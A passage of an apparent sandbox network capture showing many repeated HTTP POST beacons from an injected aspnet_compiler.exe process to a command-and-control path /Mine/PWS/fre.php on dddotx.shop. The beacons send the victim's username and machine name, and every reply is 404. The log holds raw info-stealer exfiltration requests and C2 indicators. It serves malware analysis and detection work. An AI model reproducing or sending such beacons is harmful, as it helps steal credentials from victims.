                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:45.374185085 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:46.147882938 CEST563INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2uAMHVr29L0GauloR7WxDdg5NlrRYgVqmqwjyzGzzKGSm7cq0KB9lAZKkKhU4OYrg91CUyktvcspHYWV2r17zppt9NDZwx%2FV9AXO3HqDwkPuhPk9UPRJ2v3M96gkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d6dbeab42cf-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  75192.168.2.455951188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:46.301419020 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:46.306365013 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:47.186216116 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZBpJMgSkEhUlzHQQgQee5auIXr7irW7zTO9tt5sSQjUQ58yg2w0W%2Fjd2LA9u%2FWLgbiHUAZyte3dOdECpNi3aEyVIVt7S3IABN2LBblmfvBn1hKzhkPK0kK1srwCNYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d735bdc80e2-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  76192.168.2.455952188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:47.355966091 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:47.360806942 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:48.239687920 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PkZtWyEIcvjD%2BY2eIU5JJNe4X7yAvIMhL1nIcYpWRq0LpuNmVC0WkySbZ3eUhvtw0FjfmdWsheAtltlE3%2FJ9%2BlsUWHfQ%2B%2F5zGRI8dJqAZc%2BHsKs5QELro0TQoD4N2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d7a5b668c8f-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  77192.168.2.455953188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:48.409802914 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:48.414802074 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:49.512233019 CEST581INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9D%2FZ%2FN%2FxP3SmoC5GxVLIFblR9JlPd0o2szN0te6Qq5kz9nXvvnO9RLxQp5u3FhZ%2B766%2FIGE16WufTl4D1dIrKe%2F4b35EDU8b2T%2F%2FM%2FlePmDEIi8zmhFPJf%2FKcOYwYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d804d0d8cda-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  78192.168.2.455954188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:49.672507048 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:49.677411079 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:50.344510078 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rMAb5SS%2BjDKXVQRft0%2BLVloeJplOacoHX%2BeqEsAqjcJgs95h%2FC4rewmIdHXXRcRPxJogT0eiBdkraK0HABJJeSIV9YnC0qIlefgocUlm%2F598mHnLg2%2F8JtoFesQlfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d87f96c42d3-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  79192.168.2.455955188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:50.519201994 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:50.524173975 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:51.275609016 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jeMbbF1sJ%2Bkk94cfnXUI22v9KXJWMYnXuHgfjTzEJr1RksD6SR3CLm3y8GXSqsTwAaPePkm38Zd3KLgWDndgMEfVMDVzvVBTq78%2FCph0kLyER62u79xvUJDuqA%2BT2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d8d6c79236a-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  80192.168.2.455956188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:51.423162937 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:51.428231955 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:52.197736025 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w65a9baz1SGNB38%2BgIdgTvV7fgR1PzV%2BMjbs9PTsfA3qs0UqKcFFyEKSpnVWRYYQEq18qbxVIatvgLpx3aZElxZ94tpiQpO00vK3SI6qe6ShfDM7hOJdGsPGs2eZAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d930c9b4269-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  81192.168.2.455957188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:52.536717892 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:52.541642904 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:53.229687929 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0EiiqL1NQ%2BN6k6mMNo9551mkGQokA1OdCvguvpuljgV5W%2BNpdlFM31k6%2Bp2qC%2BkCaCoFNjQPxem5zfZDagXYwziZwiKHueaUG0Xd3%2Ba3IwoOflYD0C3Eoj1aJMIPyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d99df11236b-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  82192.168.2.455958188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:53.377525091 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:53.383135080 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:54.101306915 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JM0U4PfE0tXGtJN7lBayWhkKXsYVURvvYEVobOSvnpX%2B6k8kj%2BvAMzn2htI5MHqQ5B8iDFPf1VeEIucHiYhq7lkZlfscp4KzqYzVjngOhgAKGL862AwGKBjy0uROcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d9f4db58c41-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  83192.168.2.455959188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:54.253329039 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:54.258505106 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:54.970730066 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfAjUqIopytgIuz4TBN8taqHwipOnZBYUiZq1SYTbvdqadgpz4maPQqeOtSmx%2F3XJuZ7GxTM0nup5l0mBMNKDrljZSK%2Fgu%2BsCOXsnhvFzcNpBSajdlCQN7lvC1XGTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5da4aaf142ee-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  84192.168.2.455960188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:55.418677092 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:55.425796032 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:56.064028978 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3NuHDP%2FSz%2FYtQ6ljfcB%2FI0KNXNJB7VVaA88KYoNdhTLaaeXHEqftF62DTtGg4R2fgq9Q0JSpXmL5cXbjp%2FCqMEKpqfDZ45c%2FsxfO1OKDMBY5i6s%2FCa6dBjI1Z7PviQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5dabdbdb433e-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  85192.168.2.455961188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:56.219639063 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:56.224618912 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:56.901269913 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hE9Wj%2BDYe9ODDjg4DBv7mhNm06WC8r%2FDLTOBZG81JyReIO%2FZeagdtj8bo799760FHrIzyuoLfKkuvsESeXnoL4%2B%2BI8tZvIvDWL%2FZrkUQdW2wWdjVwbJLPs9Au8CDIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5db0e82f43b2-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  86192.168.2.455962188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:57.047328949 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:57.052272081 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:57.735141993 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=REiRSDWyVSWIPBadI0g69aNy0idqBIRTK00f9sCrffQ8j8n%2Fs9aUyOuJMtGzcyJaqjh6hVUyIUpxa1rbFxvTEFRBm0zZrVmMdPmDXl4M1dLC6hu30yYuZOPYDhd%2Bcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5db619bb8c96-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  87192.168.2.455963188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:58.156909943 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:58.164944887 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:58.842067957 CEST593INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTmzMNkALUXfi3OAlPa0Geya5BIdJEC0YO0cOYAfySs8zbgQ3UEWZVgy4RjuBjpPulyAvEZ98Wjrwl2F5pSZSJSS8Sb%2FW0gyEjfRUo27VxqAmkPxOpi7lXYoa78JRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5dbcfd198c3b-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  88192.168.2.455964188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:58.983046055 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:58.987926960 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:59.669751883 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5OtQ1e2FVoKBPovdiM%2FBiCE3ZNQKym9kfJv5Jd89DovBhjFmrCL8%2BWSLg2FZsxPHJuQDATP1u9FcvYO6xNMzkIKezqO8h9fHP5c78nObwv1KyHFgxRfrAp6e54YGmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5dc22aa77274-EWR
